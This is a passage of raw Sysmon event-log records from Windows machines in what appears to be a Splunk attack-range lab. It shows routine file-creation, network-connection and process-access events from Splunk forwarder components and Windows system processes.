Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED2729330FF47EFCDE8F1AA53C446499,SHA256=D446F3F2B4D28E918C143028A20277F79E726407D9920A6A832B727FE7EC5C33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:07.310{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=198F571E8DAA4945030F36C2BB3A1F36,SHA256=3678FBD8C90418244727199220AA3890E84B3CDD5E6EB7C694D4AF40712BF340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:08.242{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E75C488A108157895FD5FC01652C1E3,SHA256=D4B198E71811872244C93D323F02BD1AF34198A0471CC4E402A4227B7973C6BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:08.342{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0FA9D7F262ED4B43110CFB28C8A62E6,SHA256=99C90392575A701B8FD804F00655730F8B563E6D654E24DE5454EB60BEEB1638,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:07.681{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51296-false10.0.1.12-8000- 23542300x8000000000000000216027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:09.429{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40B43D13F95D6CDAFF934CC421CEF944,SHA256=CB52F1E42FFA4761DF135CEAF11A80F9F28BFD3979CE2DF085E7CE57A439A673,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:09.435{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBAEA6F429093A28A6B48D392E59FF9C,SHA256=F52B1FAC6CFC3260F313170C52EE6B33FABA177A25BE87604716E52FDEAF32A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:10.585{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A22C48DC9F98EE3F25818A8417C5002E,SHA256=D548A93E94133712471DC80EDFD84146020A40ECF2F447AF48E5976FA6B3490D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:10.862{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-130MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:10.530{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E86414C18D8977ED70A9E5746FA2081,SHA256=FB3D2E241D9E18805C1B17164B99244E83314619238533CDC566C40035F5514D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:11.585{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D86C5FB14DA6E2A3F068F78EBF13065,SHA256=3EE9B71AE3A2D77CA7C3699CA215D7A30A4BC24055F8BEF322835CE61358AAC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287095Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:11.875{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-131MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:11.546{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4768686FC9DB458631FCC1708287D51,SHA256=7E5A9DAAB922DE57C5C4A45AA1BE474C097803B9E08817C466E4F4CB9A623738,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:12.585{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B86420E31F32E34438D3F25E52C4F46,SHA256=8A8A6B662B5BB3497B148FA76A45E10F7E12B248D2840E9FC5086C7B6CFC72B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287097Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:12.547{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61B097E7076E8050B8791231095955A2,SHA256=69F469169EDC253277DC1FCF3A904DC40A7E9F33FF0F86B83BEC93EB6729AE2E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287096Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:09.584{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53384-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:13.617{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC05F214AC76FA38F0129AB6B27D760C,SHA256=0B00EF69273E1C804024662C98A50C14C7E5A96FB64CD04286C8E7A392DB88F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287098Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:13.703{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE761E657A15EE8064AB1D242B7F8E73,SHA256=41C1E9959D38BD51A745502C9D1FDE7B0300CEE6451DFBD819EC16EA35DB3113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:14.632{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F67F71BFA30C093031444C7FF78E439,SHA256=C2830F737C4408B7D8DBD6836E683D53387806BA7E9EBB154AA1825971ED0EB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:14.735{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2ABF9063B32D14105F3F950471532CEB,SHA256=69633E6B56CAAABD7C5654497EE5C09E2DD4B251D36DEE4C4E938511F75E3D41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:15.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B49729565A2E894044F8F3D9A86DDD09,SHA256=B011850EF8BBD2FD2A481A164B76574D4575854FE66979D6FAF497C599568920,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:15.750{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC6DDEC2B72005DFA05666E2B410B65E,SHA256=ADDE21AB95479E55EB2FA5FFC72BBA242A55100D186EFC61FAD8269D994B18F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:16.851{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA68E5EBF501AECEF6EA8E7009BCF878,SHA256=A468F3C55E7464DFC17B5F39940BE775BB8AF26B3980764665C879578E6846B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:16.766{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89F1C27DF9846D791D8EA2E88DAD3E92,SHA256=3247AF676C46B1CD79D58246B29952C32DFC59D4B1A682FEFFA833E56F69C303,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:13.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51297-false10.0.1.12-8000- 23542300x8000000000000000216037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:17.882{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B512D039A1EB55EB1918D6B48A7831E,SHA256=D7FE04A87447C681FD4AA8EB6E091597C7587B5F2384F4818F4207D49D62DB09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:17.782{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F63E82EEB607602EBB4880C4E712E88A,SHA256=DD4A88EA4C61685C4DF4CD340EB365C56637637F69D86A493183722D7132F530,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216038Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:18.929{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B1B92507A91150F2085E0D822FFE4A,SHA256=D5A2419C809E24B0358A09056129E8AD493AC82877062DE317797F1286D39FA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287104Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:18.782{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C5016BC3E068007052457B97F5776D1,SHA256=00FF140792DA2690F24939637C49415A21FE9CEB416F51F2CD9C5A4044F132D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:15.536{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53385-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216039Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:19.945{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90980830DB08E2CDAC4FCB37BACCAC8D,SHA256=F2B6AF461E72DC690918EF743F81F9869666E1F0B140A1DF8890DB388AB9AABA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.969{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10B7-6216-F404-000000003802}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.969{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.969{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.969{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.969{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-10B7-6216-F404-000000003802}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.969{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.969{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-10B7-6216-F404-000000003802}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.970{C8EA50B7-10B7-6216-F404-000000003802}2960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.797{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65691B81D46F86B0B7D51897AE878A22,SHA256=5ECEBA556D777ABD270FA860A4936F733A5F08948769FCC427A452DBB9A4C85C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.735{C8EA50B7-10B7-6216-F304-000000003802}39725644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:19.469{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10B7-6216-F304-000000003802}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 